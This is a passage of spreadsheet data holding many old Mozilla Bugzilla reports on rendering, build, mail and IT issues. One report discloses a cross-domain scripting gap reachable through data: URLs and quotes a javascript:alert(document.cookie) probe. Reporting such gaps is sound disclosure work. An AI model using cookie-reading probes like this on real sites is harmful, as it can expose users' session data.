directory tree (or both) as input this needs to be documented in the usage
somehow along with how to specify one or the other and which is default.  
Likewise for output.  Some commands produce a JAR file as output.  They
may also leave a (modified) directory tree as output.  The production of 
the output JAR file may be optional.  The Usage needs to make this clear. 
Finally I will add that after reading the usage the reader should be able
to answer the question of which command cause any JAR file contents to be 
uncompressed and extracted.</t>
  </si>
  <si>
    <t>biswatosh2001</t>
  </si>
  <si>
    <t>CORE-116212</t>
  </si>
  <si>
    <t>bgcolor of  affect space setted by cellspacing parametr (standard mode)</t>
  </si>
  <si>
    <t>Actual:
If you set bgcolor for  (in standard mode) color is setted for whole row
including space between table cells.
Expected:
Space between table cells has color of parent - TABLE etc.
Mozilla/5.0 (Windows U WinNT4.0 en-US rv:0.9.6+) Gecko/20011219</t>
  </si>
  <si>
    <t>EXTEND_FIREFOX_GRAVEYARD-443252</t>
  </si>
  <si>
    <t>EXTEND_FIREFOX_GRAVEYARD</t>
  </si>
  <si>
    <t>updates to extendfirefox3</t>
  </si>
  <si>
    <t>Hi there -- A few changes need to happen on extendfirefox3. In order of priority:
1) on enter.php the timer needs to be modified. Instead of closing the contest at July 4th 00:00 PDT we need to have it display a message saying the contest is closed to everyone except if you are entering from Brazil. This message should be displayed on July 4th 23:59pm PDT.
2) on enter.php we need to remove the line that says (We'll provide additional details and support for developing this later in the contest.)
3) We need to update judges.php with the judges. I have this and will post the patch.</t>
  </si>
  <si>
    <t>WEBMAKER_GRAVEYARD-970833</t>
  </si>
  <si>
    <t>Are old Thimble Makes now gone forever?</t>
  </si>
  <si>
    <t>I tried to access 4 or 5 of the makes listed under line 62 of this pad:
https://teach.etherpad.mozilla.org/mooc-makes
and none of them would load. Just wondering are we deleting pre-June 15th makes from webmaker.org or is this a bug?</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-524195</t>
  </si>
  <si>
    <t>Swap mac minis with Al</t>
  </si>
  <si>
    <t>Al has a 1.83GHz mini on his desk that he's using. Can we get him a newer
(faster) mini and swap it over?</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-970349</t>
  </si>
  <si>
    <t>IT-Managed Tools</t>
  </si>
  <si>
    <t>Access to ashes in stackato</t>
  </si>
  <si>
    <t>I'm running into some problems with ashes (ashes.paas.allizom.org) and I need to look at the logs. Can I please get access to it through stackato? The old owner (basta) has left.</t>
  </si>
  <si>
    <t>bburton</t>
  </si>
  <si>
    <t>mstriemer</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-328081</t>
  </si>
  <si>
    <t>Support unification of bdate for multi-project builds</t>
  </si>
  <si>
    <t>Follow-up to bug 327823.
We need a way to set the bdate once to a single value that will be used for all projects in a multi-project build.  The architecture-specific halves of Mac universal binaries are built in multi-project builds and must have the same bdate.</t>
  </si>
  <si>
    <t>CORE-511084</t>
  </si>
  <si>
    <t>Figure out what to do with iframe/frame as a root element</t>
  </si>
  <si>
    <t>Currently nsGenericHTMLFrameElement::EnsureFrameLoader() doesn't create
frame loader if there is no parent element.
Opera and Webkit allow  as a root element.
Opera doesn't seem to load anything when  is the root.
Webkit seems to load something but paints just random garbage (both Safari and Chrome).</t>
  </si>
  <si>
    <t>CORE-530381</t>
  </si>
  <si>
    <t>Cache X11 GC for NativeImageDraw</t>
  </si>
  <si>
    <t>Created attachment 413891
patch v.1
During the review of 528551 we agreed that caching the GC might not be the safest thing to do however it does have a perf penalty to be creating a new GC each and every time through the paint code.
We should reanalyze the safeness of caching this GC.</t>
  </si>
  <si>
    <t>CORE-481057</t>
  </si>
  <si>
    <t>Implement MEDIA_ERR_DECODE machinery</t>
  </si>
  <si>
    <t>We need to implement the part of the spec that covers the if the media data is corrupted case.  This was implemented (partially?) as part of another patch but this part never made it into the tree for reasons I can't remember now.</t>
  </si>
  <si>
    <t>kinetik</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-121185</t>
  </si>
  <si>
    <t>infi.net - doesn't load and kills Moz if view-source is attempted during load</t>
  </si>
  <si>
    <t xml:space="preserve">infi.net does not load other than the title and the favicon for the page..
Mozilla simply continues to think instead of show the page.  If one stops the
browser and then right-clicks and view's source then the page source is
downloaded in completion but if one right-clicks while Mozilla is thinking
then Mozilla crashes. 
The following may be of interest in regards to the page:
they don't seem to close any of their FONT tags 
and the following javascript is at the bottom of the page but displays
nothing.. neither in IE nor (of course) Moz.
&lt;SCRIPT LANGUAGE=JavaScript1.1
SRC=http://adsonline.infi.net/RealMedia/ads/adstream_jx.ads/infi.net/index.html@Bottom&gt;
&lt;A
HREF=http://adsonline.infi.net/RealMedia/ads/click_nx.ads/infi.net/index.html@Bottom&gt;
&lt;IMG
SRC=http://adsonline.infi.net/RealMedia/ads/adstream_nx.ads/infi.net/index.html@Bottom&gt;
</t>
  </si>
  <si>
    <t>cooperg</t>
  </si>
  <si>
    <t>CORE-26430</t>
  </si>
  <si>
    <t>investigate removal of mDocument pointer from nsGeneric[HTML]Element</t>
  </si>
  <si>
    <t>Per scc's suggestion investigate time/space trade-offs from removing the 
cached mDocument pointer from nsGeneric[HTML]Element and nsXULElement and 
instead doing an O(log n) walk to the root of the element to determine the 
document.</t>
  </si>
  <si>
    <t>CORE-484076</t>
  </si>
  <si>
    <t>Update pixman and cairo</t>
  </si>
  <si>
    <t>Created attachment 368130
update pixman
The following patches update pixman and cairo to upstream trunk.
Combined they pass everything on the tryserver and bring a tp win on linux</t>
  </si>
  <si>
    <t>FIREFOX-351916</t>
  </si>
  <si>
    <t>tab corners look odd</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060907 Minefield/3.0a1
Build Identifier: 
I'd like to tweak the tab images slightly.
Reproducible: Always</t>
  </si>
  <si>
    <t>SEAMONKEY-177504</t>
  </si>
  <si>
    <t>mozilla-config.h is not installed</t>
  </si>
  <si>
    <t>make install does not install the mozilla-config.h file.
I use ./configure --prefix=... --enable-default-toolkit=gtk2 --disable-tests --
enable-xft --disable-debug.
Both with cvs and mozilla 1.2b.</t>
  </si>
  <si>
    <t>TOOLKIT-244653</t>
  </si>
  <si>
    <t>Updating themes/extensions doesnt work</t>
  </si>
  <si>
    <t>When clicking the Update button in the Theme Manager the dialog comes up telling
its searching for any new updates to the theme but it just stays there and
doesnt do anything. It never finds an update the progressbar never changes.
Only thing you can do is close the dialog.</t>
  </si>
  <si>
    <t>sboulema</t>
  </si>
  <si>
    <t>CALENDAR-180080</t>
  </si>
  <si>
    <t>Tooltips are empty when holding mouse over event.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3a) Gecko/20021113
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3a) Gecko/20021113
When mouse hovering over an event calendar displays empty tooltip.
Reproducible: Always
Steps to Reproduce:
1. Create an event.
2. Hold mouse pointer over the event
3.
Actual Results:  
Small empty tooltip box is displayed.
Expected Results:  
Display tooltip with some details about the event.</t>
  </si>
  <si>
    <t>pavel1r</t>
  </si>
  <si>
    <t>CORE-203422</t>
  </si>
  <si>
    <t>fix some build warnings in netwerk</t>
  </si>
  <si>
    <t>fix some warnings in netwerk (aka neko) which might be indicative of potential
problems.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-415648</t>
  </si>
  <si>
    <t>pt-BR / Portuguese (Brazil)</t>
  </si>
  <si>
    <t>Firefox 3 pt-BR release tracker</t>
  </si>
  <si>
    <t>This is a tracker bug for releasing Firefox 3 pt-BR.
This bug is not that detailed but as we get particular work items they should block this bug for tracking and better discoverability.</t>
  </si>
  <si>
    <t>gjalves</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-256314</t>
  </si>
  <si>
    <t>Wrong identity chosen when address contains +</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: version 0.7 (20040616)
I have a single account with half a dozen identities. Generally when I reply to
a message Thunderbird is smart and picks the right identity to reply from.
However Thunderbird always fails to pick the right identity when the address
involved contains a +
Reproducible: Always
Steps to Reproduce:
1. Create identity foo+bar@domain.org
2. Receive message addressed to foo+bar@domain.org
3. Reply to message. 
Actual Results:  
From: is incorrectly set to the default identity for the account.
Expected Results:  
Desired behavior is to have foo+bar@domain.org chosen for the From:. Note that
the following works just fine:
1. Create identity foo@domain.org
2. Receive message addressed to foo@domain.org
3. Reply to message.
4. From: is correctly set to foo@domain.org instead of the default identity for
the account.</t>
  </si>
  <si>
    <t>lhn+mozilla</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-225189</t>
  </si>
  <si>
    <t>Giving totally incorrect statement in a licensing faq</t>
  </si>
  <si>
    <t>quote:
We have also taken advantage of this provision in order to change the licensing
on some Mozilla source files currently licensed under the NPL/GPL including the
JavaScript engine source code in the js directory again the new license will
also be an NPL/GPL/LGPL triple license. 
problem statement:
I was contacted about the js relicensing and i can assure you that i was not
asked for permission to relicense under NPL/GPL/LGPL.
message to gerv:
please run any posts you make about licensing through a lawyer. you have to get
this stuff right. saying nothing is much better than getting it wrong.</t>
  </si>
  <si>
    <t>FIREFOX-219826</t>
  </si>
  <si>
    <t>some fonts not being loaded properly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5a) Gecko/20030919 Mozilla Firebird/0.6.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5a) Gecko/20030919 Mozilla Firebird/0.6.1
In some web pages it appears that some fonts specified by the web page's HTML
are not being used.  For example consider this fragment of code:
    Slashdot!
    Slashdot!
As you can tell only the word Slashdot! should appear (twice) in the Comic
Sans MS font (twice to make sure the bug was not a case sensativity issue). 
This did work at one time with Mozilla 1.3.  I had my roommate test this bug out
and for his browser the bug is not present.  His is Mozilla 1.4:
Mozilla/5.0 (X11 U Linux i586 en-US rv:1.4) Gecko/20030908 Debian/1.4-4
The font requested is definitely available to the system for example The GIMP
can see it and display it without issue.
Reproducible: Always
Steps to Reproduce:
Create a web page using the code fragment above.  Or visit www.susans.org
(Warning: Alternative lifestyle website)
Actual Results:  
The web page from which the code above was taken (and modified) was displayed
in the browser's default sans serif font.  Similiarly the code by itself
Expected Results:  
The web page should have been displayed in the specified font.</t>
  </si>
  <si>
    <t>vanessa</t>
  </si>
  <si>
    <t>FIREFOX-251802</t>
  </si>
  <si>
    <t>Refresh Livemark doesn't work from Bookmarks Toolbar or Bookmarks Menu</t>
  </si>
  <si>
    <t>found using 2004-07-15-09-0.9 (branch) on Mac OS X 10.3.4 while running this test:
http://testrunner.mozilla.org/test.cgi#889
1. go to http://del.icio.us/
2. click the lightening bolt icon in the statusbar and select the RSS item
(it's the only item in the popup menu).
3. in the resulting Add Bookmark dialog select the Bookmarks Toolbar Folder.
4. go to the Bookmarks Toolbar (BT) wait for the livemarks (RSS feeds) to load
and keep an eye the top four or so items.
5. dismiss the del.icio.us livemark and wait about a minute or so.
6. bring up the context menu for the livemark in the BT and select Refreash
Livemark then look at the top four or so feeds.
expected: the feeds should be changed.
actual results: the feeds are not changed. this is not a problem when I refresh
the livemark from either the Bookmarks Manager window or the Bookmarks Sidebar.</t>
  </si>
  <si>
    <t>FIREFOX-327395</t>
  </si>
  <si>
    <t>No keyboard-accessible way to move a folder of bookmarks from one folder to another in Places</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060214 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060214 Firefox/1.6a1
In Firefox 1.5's Bookmark Manager you can select one or more bookmarks and click Move which brings up a dialog where you can select the target folder to move the bookmarks.  Places has no such functionality.  The Cut menu item in the context menu is enabled so I tried cutting the bookmark and pasting it in another folder but this does nothing -- it neither removes the bookmark from the original folder nor creates the bookmark in the target folder.
I also expected to be able to copy (not move) a bookmark by selecting Copy from the context menu then Paste it in another folder but this does not do anything either.
Reproducible: Always
Steps to Reproduce:
Actual Results:  
Inspect32</t>
  </si>
  <si>
    <t>CORE-261040</t>
  </si>
  <si>
    <t>Borders should not be included in GetActualScrollbarSizes</t>
  </si>
  <si>
    <t>When implementing support for tabbability of css scrollable areas with
scrollbars I had trouble reliably knowing when there was a scrollbar.
Robert O'callahan says this is partially due to margins being included in
GetActualScrollbarSizes (hopefully I've got that right).</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-434486</t>
  </si>
  <si>
    <t>Repair and restyle /users</t>
  </si>
  <si>
    <t>Needs to work and look a lot less crappy :)</t>
  </si>
  <si>
    <t>SEAMONKEY-299812</t>
  </si>
  <si>
    <t>Changing (Win32) Readme.txt for SeaMonkey</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050705 SeaMonkey/1.0a Mnenhy/0.7.2.10005
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050705 SeaMonkey/1.0a Mnenhy/0.7.2.10005
We need to Change/Modify the Readme.txt (seamonkey\readme.txt) for SeaMonkey
because of the Mozilla Content and Links in the current readme.txt
http://lxr.mozilla.org/seamonkey/source/README.txt
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-103811</t>
  </si>
  <si>
    <t>members.aon.at - Background images (.jpg) are not shown</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9.4+)
Gecko/20011008
BuildID:    2001100803
This page has some images that should be in the background (e.g. image005.jpg
...) in the upper part of the page (under the links). They do not show in Mozilla.
Reproducible: Always
Steps to Reproduce:
1. http://members.aon.at/erlebniswerkstatt/
2. compare result with Internet Explorer
3.
Note:
This page (created by Microsoft Word) may be Microsoft specific. It is not
displayed correctly in Netscape 4.78 either.</t>
  </si>
  <si>
    <t>h.leininger</t>
  </si>
  <si>
    <t>BUGZILLA-374850</t>
  </si>
  <si>
    <t>Add a link that encourages administrators to contribute to Bugzilla</t>
  </si>
  <si>
    <t>All of our contributors were at one time Bugzilla administrators or users. Most were administrators.
We want more contributors. :-)
We should have a link in the product itself that is displayed only to users in the admin group that points out that they can contribute and links them to http://www.bugzilla.org/contribute/.
I know it's an enhancement but I'd really like to see this go into 3.0 so that we can hopefully get improved contributions starting with the release of 3.0 which I expect to be a big release.</t>
  </si>
  <si>
    <t>CORE-209430</t>
  </si>
  <si>
    <t>Ctrl+Delete and Ctrl+BackSpace delete words in the wrong direction</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (BeOS U BeOS BePC en-US rv:1.3) Gecko/20030314
Build Identifier: Mozilla/5.0 (BeOS U BeOS BePC en-US rv:1.3) Gecko/20030314
In right-to-left forms pressing Accel+Delete deletes backwards and
Accel+BackSpace deletes forwards - it should be the opposite.
Reproducible: Always
Steps to Reproduce:
1. Open http://oren.gomen.org/mozilla/textareas.html
2. Place the caret between the two words
3. Press Accel+Delete (Ctrl+Delete in Windows)
Actual Results:  
The first word is deleted (backward delete)
Expected Results:  
The second word should be deleted (forward delete)
Repeat test with Accel+BackSpace -&gt; second word is deleted instead of the first one.
Tested with Mozilla 1.4rc1 1.2.1 and Firebird 0.6 (WinXP Pro) and Mozilla 1.3
(BeOS)
Prog.</t>
  </si>
  <si>
    <t>CORE-130137</t>
  </si>
  <si>
    <t>js_AddNativeProperty&amp;js_ChangeNativePropertyAttrs fail to lock obj!</t>
  </si>
  <si>
    <t>This is a stupid oversight on my part.  These functions wrap js_AddScopeProperty
and js_ChangeScopePropertyAttributes calling js_GetMutableScope first to ensure
that obj has its own scope.  They utterly fail to follow the locking protocol
and do what other such layers in jsobj.c on top of jsscope.c functions must do.
 Patch in a second this is a must-fix for 1.0.
/be</t>
  </si>
  <si>
    <t>CORE-304690</t>
  </si>
  <si>
    <t>Stand-alone applications can do cross-domain scripting through Firefox</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
As far as i understand the fix for bug #298255 it was intendet to stop the
ability to load chrome urls from external applications and to clear the context
of javascript calls to about:blank.
Tested with Firefox 1.0.6 and it works as expected: can not load chrome and
javascript urls don't have access to document.cookie (although a
javascript:alert(document.cookie) gives the current domain as title of the alert
dialog instead of javascript application or about:blank).
But by calling a data: url it is still possible to do cross-domain scripting. Is
this expected behavior in 1.0.6 or was this overlooked?
Reproducible: Always</t>
  </si>
  <si>
    <t>mikx</t>
  </si>
  <si>
    <t>BUGZILLA-525252</t>
  </si>
  <si>
    <t>editproducts.cgi should only list classifications in which there are products you can administer</t>
  </si>
  <si>
    <t>If you have product-specific editcomponents privs only and if useclassifications is turned on editproducts.cgi lists all existing classifications including those containing no product which you can edit. This is confusing and also make harder to remember which classifications you can really go into. The list should be filtered to only display relevant classifications.</t>
  </si>
  <si>
    <t>CORE-117821</t>
  </si>
  <si>
    <t>Fix unbalanced FIXptr pair</t>
  </si>
  <si>
    <t>Unbalanced FIXptr pair is a pair of FIXptrs where the FIXptr targets intersect
each other. Currently the code does not detect this and returns a range whose
start point is the start point of the first FIXptr and end point is the end
point of the second FIXptr. I think we should return a range of the
intersection but I am not sure in which order the end points should be.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-343503</t>
  </si>
  <si>
    <t>Discontinued Extension: LiveURLs</t>
  </si>
  <si>
    <t>LiveURLs 0.1 by Natarajan Kannan Toufeeq Hussain released on Apr 19 2006
Please consider using Web-Marker: https://addons.mozilla.org/firefox/2679/ instead of this extension. The development of this extension will be dis-continued. This exension is available here only for development purposes. Thanks.</t>
  </si>
  <si>
    <t>CORE-117984</t>
  </si>
  <si>
    <t>[PFM]ASSERTION: frame was not removed from primary frame map before destruction...</t>
  </si>
  <si>
    <t>When loading the above page I hit the assertion in
FrameManager::NotifyDestroyingFrame() about the frame not being removed
propertly from the primary frame map. Seems bad...</t>
  </si>
  <si>
    <t>NSS-464246</t>
  </si>
  <si>
    <t>Use separate file for Tinderbox machines configurations.</t>
  </si>
  <si>
    <t>Current Tinderbox version consist of 2 files - tinder.sh (code part) and env.sh (configuration part).
Configuration part in env.sh contains global settings but also configurations of machines. Because of sensitive info about machines we decided to put to mozilla cvs repository only modified version of env.sh with removed info about sun machines. Christophe suggested to split env.sh to 2 files - one for general settings and one for machine configurations and then keep synchronized env.sh on machines with version in mozilla cvs repository.</t>
  </si>
  <si>
    <t>slavomir.katuscak+mozilla</t>
  </si>
  <si>
    <t>JSS-100796</t>
  </si>
  <si>
    <t>calling undeclared functions breaks AIX build</t>
  </si>
  <si>
    <t>Several NSS functions are called before they are declared. In most cases the
fix is to include the right header file.
Also bug 100791 (misspelled function prototypes in pk11func.h) aggravates the
problem.</t>
  </si>
  <si>
    <t>jamie-bugzilla</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-500716</t>
  </si>
  <si>
    <t>[l10n] In 3.5 landing page for zh-TW locale the page is not up to date</t>
  </si>
  <si>
    <t>The 3.5 landing page for zh-TW locale is not up to date. It should concern Firefox 3.5 and not Firefox 3.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-150588</t>
  </si>
  <si>
    <t>apple.com - Page doesn't display completely due to being invalid and malformed</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.0.0) Gecko/20020529
BuildID:    2002052918
Try searching for the word socket on this page.
Now view source and search for socket. 
Perhaps this is invalid xhtml? IE 5.1 renders it completely (it's probably more
forgiving of bad html...)
I realise that it's ideal to promote corect html but could there be either
1. an option to revert to a more forgiving parser?
2. An option to generate a report of the parser's problems with the
   page to send back to the page's maintainers so they can correct
   their page. (This may be a big help in promoting correct html or 
   a big irritation...)
Reproducible: Always
Steps to Reproduce:
1. search for the given url
2. search for socket in the returned page
3. search for socket in the source of the page
4. compare with IE5.1
Expected Results:  perhaps it did the 'correct' thing but it was less than
useful for me.</t>
  </si>
  <si>
    <t>matthew.harrison</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-278604</t>
  </si>
  <si>
    <t>Mail Client - New Message - Alt-E shortcut does not work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 de-AT rv:1.7.5) Gecko/20041217
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 de-AT rv:1.7.5) Gecko/20041217
Creating a new mail cursor in text area on pressing ALT-E for _E_infÃ¼gen the
cursor springs back to Betreff line. The wished menu EinfÃ¼gen can not be
opened by keyboard short cut.
Reproducible: Always
Steps to Reproduce:
1. Open Mail Client
2. Click on Verfassen to create a new message
3. Use the keyboard shortcut ALT-E - expected is the menu _E_instellungen</t>
  </si>
  <si>
    <t>wolf-lex</t>
  </si>
  <si>
    <t>CORE-96485</t>
  </si>
  <si>
    <t>Layout: Images, Video, and HTML Frames</t>
  </si>
  <si>
    <t>referrer not sent for images loaded via javascript new Image()</t>
  </si>
  <si>
    <t>I have a little stat tracking bug embedded in the page give above. It's just
used to record the site visitor's viewable browser dimentions. While viewing the
apache log files to extract the info I noticed that Mozilla was the only browser
where the referrer field was *not* valued. This was the case with the following
user agent strings:
Mozilla/5.0 (Macintosh N PPC en-US m18) Gecko/20010131 Netscape6/6.01
Mozilla/5.0 (Windows U Windows NT 5.0 en-US m18) Gecko/20010131 Netscape6/6.01
Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9.3) Gecko/20010801
Mozilla/5.0 (Windows U WinNT4.0 en-US rv:0.9.3+) Gecko/20010806
[only a few sorry i just created this tracker]
This information is valued for ever other user agent that has made the image
request [IE45 &amp; 6 &amp; NN4.x on both mac and pc]
---
The code that is being exected is as follows:
function triggerbug() {
var iWidth = (window.innerWidth) ? window.innerWidth : document.body.offsetWidth
var iHeight = (window.innerHeight) ? window.innerHeight :
document.body.offsetHeight
var bug = new Image()
bug.src = bug.gif?clientw= + iWidth + 
}
---
now the linked site doesn't require referrer to function it's just something i
noticed cause i was in my logs. That's not to say other sites do not rely on
this functionality to work.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-219521</t>
  </si>
  <si>
    <t>nsDragService leaks gdk window because it shuts down after event loop</t>
  </si>
  <si>
    <t>nsDragService leaks one gdk window because it shuts down after the main event
loop does.  I'll attach a patch that fixes this leak.</t>
  </si>
  <si>
    <t>CORE-203923</t>
  </si>
  <si>
    <t>reframing single table-cell inside pseudo table-row is broken</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 hu-HU rv:1.4a) Gecko/20030401
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 hu-HU rv:1.4a) Gecko/20030401
removing className width MozOpacity + display: table-cell
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>gellert.gyuris</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-466947</t>
  </si>
  <si>
    <t>Sisyphus - retry profile creation on failure</t>
  </si>
  <si>
    <t>Created attachment 350293
patch
Depending on machine load profile creation will occasionally take longer than 30 seconds to complete. This patch retries profile creation up to 3 times before throwing a fatal error.</t>
  </si>
  <si>
    <t>SEAMONKEY-156632</t>
  </si>
  <si>
    <t>useless call to PR_CurrentThread</t>
  </si>
  <si>
    <t>i've been reading ah_crap_handler and noticed that its first statement:
PR_CurrentThread() is useless.  It's not designed to have side-effects and while
it does return a value this callsite treats it as void.
I think it can and should be removed.</t>
  </si>
  <si>
    <t>timwatt</t>
  </si>
  <si>
    <t>BUGZILLA-292117</t>
  </si>
  <si>
    <t>Tabs aren't stripped by watcher field when converting creatures into email accounts</t>
  </si>
  <si>
    <t>steps:
add nobody@mozilla.org to your watch list and submit
actual results:
    The name 	nobodymozilla.org is not a valid username.  
    Either you misspelled it or the person has not
    registered for a Bugzilla account.
expected results: treat all whitespace characters as harmless delimiters instead
of confusing poor table users.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-342178</t>
  </si>
  <si>
    <t>Litmus doesn't remember the build id when going to run more tests</t>
  </si>
  <si>
    <t>Previously Litmus saved the sysconfig information in a session cookie so if you went to run more tests you wouldn't have to fill in your platform and build id again. This got broken somewhere along the line and no longer works. The cookie is getting set but it is not being read back properly.</t>
  </si>
  <si>
    <t>CORE-10998</t>
  </si>
  <si>
    <t>nsXPCThreadJSContextStackImpl static mSingleton not getting cleared on destruction</t>
  </si>
  <si>
    <t>mSingleton was a static member of the GetSingleton method and was not getting
cleared when the object was destroyed.  Second attempts to create the object
failed.
Index: xpcprivate.h
===================================================================
RCS file: /cvsroot/mozilla/js/src/xpconnect/src/xpcprivate.hv
retrieving revision 1.19
diff -u -r1.19 xpcprivate.h
--- xpcprivate.h        1999/07/15 05:42:49     1.19
+++ xpcprivate.h        1999/07/31 08:17:48
@@ -8606 +8608 @@
     // hide ctor and dtor
     nsXPCThreadJSContextStackImpl()
     virtual ~nsXPCThreadJSContextStackImpl()
+    static nsXPCThreadJSContextStackImpl* mSingleton
+
 }
Index: xpcthreadcontext.cpp
===================================================================
RCS file: /cvsroot/mozilla/js/src/xpconnect/src/xpcthreadcontext.cppv
retrieving revision 1.2
diff -u -r1.2 xpcthreadcontext.cpp
--- xpcthreadcontext.cpp        1999/07/15 05:42:50     1.2
+++ xpcthreadcontext.cpp        1999/07/31 08:21:32
@@ -7119 +7124 @@
     NS_ADDREF_THIS()
 }
-nsXPCThreadJSContextStackImpl::~nsXPCThreadJSContextStackImpl() {}
+nsXPCThreadJSContextStackImpl::~nsXPCThreadJSContextStackImpl()
+{
+    mSingleton = nsnull
+}
 static NS_DEFINE_IID(knsXPCThreadJSContextStackImplIID
NS_IJSCONTEXTSTACK_IID)
 NS_IMPL_ISUPPORTS(nsXPCThreadJSContextStackImpl
knsXPCThreadJSContextStackImplIID)
+nsXPCThreadJSContextStackImpl* nsXPCThreadJSContextStackImpl::mSingleton =
nsnull
+
 //static
 nsXPCThreadJSContextStackImpl*
 nsXPCThreadJSContextStackImpl::GetSingleton()
 {
-    static nsXPCThreadJSContextStackImpl* singleton = NULL
-    if(!singleton)
-        singleton = new nsXPCThreadJSContextStackImpl()
-    return singleton
+    if(!mSingleton)
+        mSingleton =
+            new nsXPCThreadJSContextStackImpl()
+    return mSingleton
 }
 /* readonly attribute PRInt32 Count */</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-291512</t>
  </si>
  <si>
    <t>Java to XPCOM Bridge</t>
  </si>
  <si>
    <t>Use nsIInterfaceInfoManager to generate Java interface files</t>
  </si>
  <si>
    <t>Currently I am using xpidl to generate the Java interface files.  The main
issue with this is that xpidl doesn't know whether some interfaces are
IDL-defined so it ends up writing out nsISupports for many parameters.  The
InterfaceInfoManager should be able to supply the correct interface names.</t>
  </si>
  <si>
    <t>FIREFOX-387912</t>
  </si>
  <si>
    <t>Default Application download path has uneditable text region</t>
  </si>
  <si>
    <t>Created attachment 272047
uneditable (but looks editable) default application region
Mozilla/5.0 (Macintosh U Intel Mac OS X es-ES rv:1.9a7pre) Gecko/2007071204 Minefield/3.0a7pre
Goto Preferences &gt; Content &gt; File Types &gt; Manage... &gt; Change Action.. dialog window 
The first option to Open them with the default application for extension shows up with a text region that is uneditable.  Yet the user can still enter a cursor in the field.   Shouldnt the default application be selected here and if no default app the text region should gray out?
See attachment.</t>
  </si>
  <si>
    <t>chung808</t>
  </si>
  <si>
    <t>CORE-435664</t>
  </si>
  <si>
    <t>Crash after clicking 'Print This Page' on National Grid website (Firefox 3 RC1) [@ ReparentFrame(nsIFrame* nsIFrame* nsIFrame*)]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008051206 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008051206 Firefox/3.0
When you click 'Print This Page' at http://www.nationalgrid.com/uk/Gas/Connections/CompetitiveQuotationForm/CompetitiveQuotation.htm Firefox crashes.  This works in IE Opera and Safari.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.nationalgrid.com/uk/Gas/Connections/CompetitiveQuotationForm/CompetitiveQuotation.htm
2. Click 'Print this page' on upper right hand side
3. Watch it crash
Actual Results:  
Firefox terminates then I get the dialog box asking me if I want to send info to Microsoft.
Expected Results:  
data should be sent to the printer
Fails every time.</t>
  </si>
  <si>
    <t>clark.andy</t>
  </si>
  <si>
    <t>NSS-72013</t>
  </si>
  <si>
    <t>Needed improvements to QA reports logs and results</t>
  </si>
  <si>
    <t>In the log for the failed HP run on orville we find these lines:
selfserv: SSL_ConfigServerSessionIDCache returned error -5956:
The device for storing the file is full.
Yet the extracted error for orville at the bottom of the attached QA report
does not contain those lines.  I think the QA report should show the
actual error lines from the log file.</t>
  </si>
  <si>
    <t>SEAMONKEY-513490</t>
  </si>
  <si>
    <t>Open is not marked as the default double click action in Download Manager context menu</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.4pre) Gecko/20090829 SeaMonkey/2.0b2pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.4pre) Gecko/20090829 SeaMonkey/2.0b2pre
